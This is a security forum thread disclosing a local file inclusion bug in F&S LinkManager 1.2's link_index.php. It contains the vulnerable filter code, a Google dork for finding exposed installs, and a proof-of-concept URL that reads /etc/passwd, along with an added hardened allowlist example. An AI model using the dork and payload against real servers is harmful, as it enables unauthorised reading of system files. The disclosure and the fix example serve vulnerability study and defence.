Guest Kenpachi

[RST] [LFI] F&S LinkManager 1.2 Final Gold Edition

Guest Kenpachi
Posted

Software : F&S LinkManager 1.2 Final Gold Edition
BUG Type : Local File Inclusion
BUG In : link_index.php
BUG :

$show = $HTTP_GET_VARS['show'];

if ($show == "") {
    [...]
}
else {
    // [RFI FILTER]
    $oldshow = $show;
    $oldsize = strlen($show);
    $show = str_replace("http://", "", $show);
    $show = str_replace("www", "", $show);
    $show = str_replace("ftp://", "", $show);
    $show = str_replace("https://", "", $show);
    $newsize = strlen($show);

    if ($oldsize == $newsize)
    {
        // [NO LFI FILTER]
        include "$show";
    }
}

Google Dork : inurl:"link_index.php?show"

POC : [url]www.example.com/[/url][path]/link_index.php?show=/etc/passwd


//Kenpachi @ RSTCENTER.COM
NO GREETS, JUST ME

At stroke's recommendation, here is also a link to download the software in question:
[url]http://rapidshare.com/files/138499333/linklist.zip.html[/url]
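
Added example (not part of the original post and not LinkManager code): the check from link_index.php reproduced next to a hardened lookup, run over constructed inputs, to show that a local path passes the scheme-stripping filter while an allowlist rejects it. The demo directory, the $allowed map and both function names are assumptions.

```php
<?php
// Added example, not LinkManager code. The demo directory, the $allowed map
// and both function names are assumptions made for illustration.

// Mirrors the check in link_index.php: true means the value reaches include.
function passes_original_filter(string $show): bool
{
    $stripped = str_replace(['http://', 'www', 'ftp://', 'https://'], '', $show);
    return strlen($stripped) === strlen($show);
}

// Hardened lookup: the request value only selects a key in a fixed map,
// so request data never becomes part of a file path.
function resolve_page(string $show, string $baseDir, array $allowed): ?string
{
    if (!isset($allowed[$show])) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$show]);
    // Defence in depth: the resolved file must still sit inside $baseDir.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed sample setup so the script runs on its own.
$baseDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lm_pages_demo';
is_dir($baseDir) || mkdir($baseDir);
file_put_contents($baseDir . DIRECTORY_SEPARATOR . 'links.php', '<?php echo "links page";');
$allowed = ['links' => 'links.php'];

// Constructed inputs; in the application the value would be $_GET['show'].
foreach (['links', 'no-such-page', '/etc/passwd', 'http://host.example/x.txt'] as $show) {
    printf("%-26s original: %-8s hardened: %s\n",
        $show,
        passes_original_filter($show) ? 'include' : 'blocked',
        resolve_page($show, $baseDir, $allowed) !== null ? 'include' : 'rejected');
}
```

Only the value returned by resolve_page() should ever be passed to include; a null result should be answered with a 404.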

Posted

nice find

those programmers are kind of blockheads :))

else {
[RFI FILTER
$oldshow = $show;
$oldsize = strlen($show);
$show = str_replace("http://", "" , $show);
$show = str_replace("www", "" , $show);
$show = str_replace("ftp://", "" , $show);
$show = str_replace("https://", "" , $show);
$newsize = strlen($show);

if($oldsize == $newsize)
{
[NO LFI FILTER ]
